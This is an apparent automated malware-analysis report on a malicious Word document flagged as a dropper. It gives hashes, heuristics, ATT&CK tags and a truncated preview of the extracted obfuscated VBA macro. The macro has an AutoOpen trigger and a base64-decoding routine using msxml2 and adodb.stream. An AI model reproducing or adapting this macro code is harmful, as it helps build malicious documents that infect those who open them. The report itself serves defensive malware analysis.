Office (OLE) malware analysis — malicious · 7aa51ea9215772ed

MALICIOUS

Office (OLE)

167.0 KB Created: 2017-05-02 11:48:00 Authoring application: Microsoft Office Word First seen: 2017-05-13

MD5: 7752266ce9339de6cde4ce40436c3c60 SHA-1: 5155dcf9ede5638c67df022b6b8b2179cae9ca69 SHA-256: 7aa51ea9215772edb4f363427928d97ead17fd54dbb1572fd0b7e4ba0a0ebf13

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample is a malicious Office document containing VBA macros. The AutoOpen macro is present and uses Shell() and CreateObject() calls, indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6306064-0' further supports its malicious nature. The VBA script attempts to create an msxml2.domdocument object, which is often used to download and process external content.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6306064-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6306064-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14659 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14659 bytes
SHA-256: `474d54896622c95cc84a8083c850cb89a1ec72b99c0e72da7b7c46500ad5969b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub AutoOpen() Dim o9itHkOSK As Long o9itHkOSK = 0 Dim avC2d avC2d = Len(bEQOHjonJ) Dim zrO890SZ As Single zrO890SZ = Int(55243.723741358) xi65KTM4Z End Sub Attribute VB_Name = "Module2" Function DkHz23N(ByVal noECkTb) Dim nNBHT As Double nNBHT = 5173.0854656148 Dim eWfiweI As Single eWfiweI = 43912.772216759 Dim Ovuoj As Byte Ovuoj = 177 Dim Tv50dh8P As Single Tv50dh8P = Round(4788.0466832183) Dim aIa9UGrZu As Byte aIa9UGrZu = 219 Dim F57kR Dim rXQ41 Dim QtfQj7UK As Double QtfQj7UK = Round(26976.07337495) Dim hC10E6Gto As Byte hC10E6Gto = 50 Dim XCyFq As Single XCyFq = Sgn(6204.2047696134) Dim wj0fc As Long wj0fc = 0 Dim WMBdSyvwC As Single WMBdSyvwC = 64724.471056475 Dim hHAnSRUd7 hHAnSRUd7 = StrConv(y2zRd, vbProperCase) Set F57kR = CreateObject("msxml2.domdocument") Dim aeCbgwh8 As Byte aeCbgwh8 = 180 Dim GkeZP As Byte GkeZP = 146 Dim cuh89 As Boolean cuh89 = False Dim Ww08oCNdi As Boolean Ww08oCNdi = True Dim TxaoMm As Long TxaoMm = Sgn(0) Set rXQ41 = F57kR.CreateElement("base64") Dim MovKFRx7g As Long MovKFRx7g = -1116398190 Dim KIZ26tWob As Long KIZ26tWob = -1742339170 Dim QqQv5Gs As Boolean QqQv5Gs = True Dim aKun6 As String aKun6 = AscB("a") rXQ41.dataType = "bin.base64" Dim KOzW9ft8s As Boolean KOzW9ft8s = True Dim QfoixF5 QfoixF5 = "" Dim YzJ7Tm As String YzJ7Tm = AscW("6") Dim QKGArt As Double QKGArt = 25116.737834828 Dim kAdpaG5 As Long kAdpaG5 = -712602108 rXQ41.text = noECkTb Dim cpthHvCk As Byte cpthHvCk = 113 Dim dTS2VU As Long dTS2VU = Sgn(-1912445104) DkHz23N = lCwXNqIf9(rXQ41.nodeTypedValue) Dim kBvJTjhx3 As Long kBvJTjhx3 = 0 Dim kYXFWV7k As Boolean kYXFWV7k = False Set rXQ41 = Nothing Set F57kR = Nothing End Function Function lCwXNqIf9(Binary) Dim TpEkDRiq As Single TpEkDRiq = 6495.2625005971 Dim cPXhZ6SC As String cPXhZ6SC = "*" Const HhbJ8Hlop = 2 Const UHTtVW = 1 Dim y9VfUwql1 As Boolean y9VfUwql1 = True Dim fkHNGb As Integer fkHNGb = -7673 Dim Rewjs As Boolean Rewjs = True Dim idMyI As Long idMyI = Sgn(0) Dim JgrbLPsn Dim D3WctPU As Long D3WctPU = -1066645946 Dim VvTPI As Boolean VvTPI = False Dim E1Dkm As Byte E1Dkm = 7 Dim TwtC61syl As Integer TwtC61syl = 29851 Dim QbjJk As Byte QbjJk = 103 Dim eS4D7n9 As Single eS4D7n9 = 8747.025992792 Dim bLvh8lOIS As Single bLvh8lOIS = Fix(49966.498031511) Dim ytpb4cxS As Single ytpb4cxS = 9902.2931860725 Set JgrbLPsn = CreateObject("adodb.stream") Dim iv2Po6EZ As Boolean iv2Po6EZ = False Dim d2zNX7F As Long d2zNX7F = Sgn(-314066216) Dim rqpDRbnJi As Byte rqpDRbnJi = 151 With JgrbLPsn Dim orIpKb As Long orIpKb = Sgn(-1001935252) Dim vgiHYD As Boolean vgiHYD = True Dim q3HuDbmSw As Double q3HuDbmSw = Sgn(54747.06748795) .Type = UHTtVW Dim eCL4iSc As Long eCL4iSc = Sgn(0) Dim UfTNaP As Long UfTNaP = Sgn(-1375579846) Dim h7RnI As Byte h7RnI = 111 Dim ucs5CR As Boolean ucs5CR = True Dim wJqbH As Long wJqbH = 0 .Open Dim lQjA8 As Boolean lQjA8 = True Dim KVsro KVsro = Len(brhe4w) .Write Binary Dim AQRrs51w As Byte AQRrs51w = 129 Dim OIyzlWHQY As Long OIyzlWHQY = Sgn(0) .Position = 0 Dim klSDTe As Byte klSDTe = 171 Dim WQtjAuzs5 As Integer WQtjAuzs5 = Sgn(24182) Dim nw4W1SIN As Byte nw4W1SIN = 225 .Type = HhbJ8Hlop Dim E0y6SP As Double E0y6SP = Val(16004.594768499) Dim d6HyA0S As Integer d6HyA0S = Sgn(-6931) Dim CVj2JLeg As Byte CVj2JLeg = 25 Dim QXGBz As Byte QXGBz = 3 .CharSet = "ascii" Dim nh9Uwe As Boolean nh9Uwe = True Dim YNLcW9 As Single YNLcW9 = 50893.808156209 lCwXNqIf9 = .ReadText End With Dim xefiz8xY As Byte xefiz8xY = 5 Dim ZcnYV As String ZcnYV = RTrim(F3Mm42xJ0) Dim zS4uegq As Long zS4uegq = -1386198312 Dim eHQGnutUf As Single ... (truncated)

SHA-256: 474d54896622c95cc84a8083c850cb89a1ec72b99c0e72da7b7c46500ad5969b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()

Dim o9itHkOSK As Long
o9itHkOSK = 0
Dim avC2d
avC2d = Len(bEQOHjonJ)
Dim zrO890SZ As Single
zrO890SZ = Int(55243.723741358)
xi65KTM4Z
End Sub

Attribute VB_Name = "Module2"
Function DkHz23N(ByVal noECkTb)

Dim nNBHT As Double
nNBHT = 5173.0854656148
Dim eWfiweI As Single
eWfiweI = 43912.772216759
Dim Ovuoj As Byte
Ovuoj = 177
Dim Tv50dh8P As Single
Tv50dh8P = Round(4788.0466832183)
Dim aIa9UGrZu As Byte
aIa9UGrZu = 219
Dim F57kR
Dim rXQ41
Dim QtfQj7UK As Double
QtfQj7UK = Round(26976.07337495)
Dim hC10E6Gto As Byte
hC10E6Gto = 50
Dim XCyFq As Single
XCyFq = Sgn(6204.2047696134)

Dim wj0fc As Long
wj0fc = 0
Dim WMBdSyvwC As Single
WMBdSyvwC = 64724.471056475
Dim hHAnSRUd7
hHAnSRUd7 = StrConv(y2zRd, vbProperCase)
Set F57kR = CreateObject("msxml2.domdocument")

Dim aeCbgwh8 As Byte
aeCbgwh8 = 180
Dim GkeZP As Byte
GkeZP = 146
Dim cuh89 As Boolean
cuh89 = False
Dim Ww08oCNdi As Boolean
Ww08oCNdi = True
Dim TxaoMm As Long
TxaoMm = Sgn(0)
Set rXQ41 = F57kR.CreateElement("base64")

Dim MovKFRx7g As Long
MovKFRx7g = -1116398190
Dim KIZ26tWob As Long
KIZ26tWob = -1742339170
Dim QqQv5Gs As Boolean
QqQv5Gs = True
Dim aKun6 As String
aKun6 = AscB("a")
rXQ41.dataType = "bin.base64"

Dim KOzW9ft8s As Boolean
KOzW9ft8s = True
Dim QfoixF5
QfoixF5 = ""
Dim YzJ7Tm As String
YzJ7Tm = AscW("6")
Dim QKGArt As Double
QKGArt = 25116.737834828
Dim kAdpaG5 As Long
kAdpaG5 = -712602108
rXQ41.text = noECkTb

Dim cpthHvCk As Byte
cpthHvCk = 113
Dim dTS2VU As Long
dTS2VU = Sgn(-1912445104)
DkHz23N = lCwXNqIf9(rXQ41.nodeTypedValue)

Dim kBvJTjhx3 As Long
kBvJTjhx3 = 0
Dim kYXFWV7k As Boolean
kYXFWV7k = False
Set rXQ41 = Nothing
Set F57kR = Nothing
End Function
Function lCwXNqIf9(Binary)

Dim TpEkDRiq As Single
TpEkDRiq = 6495.2625005971
Dim cPXhZ6SC As String
cPXhZ6SC = "*"
Const HhbJ8Hlop = 2
Const UHTtVW = 1

Dim y9VfUwql1 As Boolean
y9VfUwql1 = True
Dim fkHNGb As Integer
fkHNGb = -7673
Dim Rewjs As Boolean
Rewjs = True
Dim idMyI As Long
idMyI = Sgn(0)
Dim JgrbLPsn

Dim D3WctPU As Long
D3WctPU = -1066645946
Dim VvTPI As Boolean
VvTPI = False
Dim E1Dkm As Byte
E1Dkm = 7

Dim TwtC61syl As Integer
TwtC61syl = 29851
Dim QbjJk As Byte
QbjJk = 103
Dim eS4D7n9 As Single
eS4D7n9 = 8747.025992792
Dim bLvh8lOIS As Single
bLvh8lOIS = Fix(49966.498031511)
Dim ytpb4cxS As Single
ytpb4cxS = 9902.2931860725
Set JgrbLPsn = CreateObject("adodb.stream")

Dim iv2Po6EZ As Boolean
iv2Po6EZ = False
Dim d2zNX7F As Long
d2zNX7F = Sgn(-314066216)
Dim rqpDRbnJi As Byte
rqpDRbnJi = 151
With JgrbLPsn
Dim orIpKb As Long
orIpKb = Sgn(-1001935252)
Dim vgiHYD As Boolean
vgiHYD = True
Dim q3HuDbmSw As Double
q3HuDbmSw = Sgn(54747.06748795)
.Type = UHTtVW
Dim eCL4iSc As Long
eCL4iSc = Sgn(0)
Dim UfTNaP As Long
UfTNaP = Sgn(-1375579846)
Dim h7RnI As Byte
h7RnI = 111
Dim ucs5CR As Boolean
ucs5CR = True
Dim wJqbH As Long
wJqbH = 0
.Open

Dim lQjA8 As Boolean
lQjA8 = True
Dim KVsro
KVsro = Len(brhe4w)
.Write Binary

Dim AQRrs51w As Byte
AQRrs51w = 129
Dim OIyzlWHQY As Long
OIyzlWHQY = Sgn(0)
.Position = 0

Dim klSDTe As Byte
klSDTe = 171
Dim WQtjAuzs5 As Integer
WQtjAuzs5 = Sgn(24182)
Dim nw4W1SIN As Byte
nw4W1SIN = 225
.Type = HhbJ8Hlop
Dim E0y6SP As Double
E0y6SP = Val(16004.594768499)
Dim d6HyA0S As Integer
d6HyA0S = Sgn(-6931)

Dim CVj2JLeg As Byte
CVj2JLeg = 25
Dim QXGBz As Byte
QXGBz = 3
.CharSet = "ascii"

Dim nh9Uwe As Boolean
nh9Uwe = True
Dim YNLcW9 As Single
YNLcW9 = 50893.808156209
lCwXNqIf9 = .ReadText
End With

Dim xefiz8xY As Byte
xefiz8xY = 5
Dim ZcnYV As String
ZcnYV = RTrim(F3Mm42xJ0)
Dim zS4uegq As Long
zS4uegq = -1386198312
Dim eHQGnutUf As Single

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.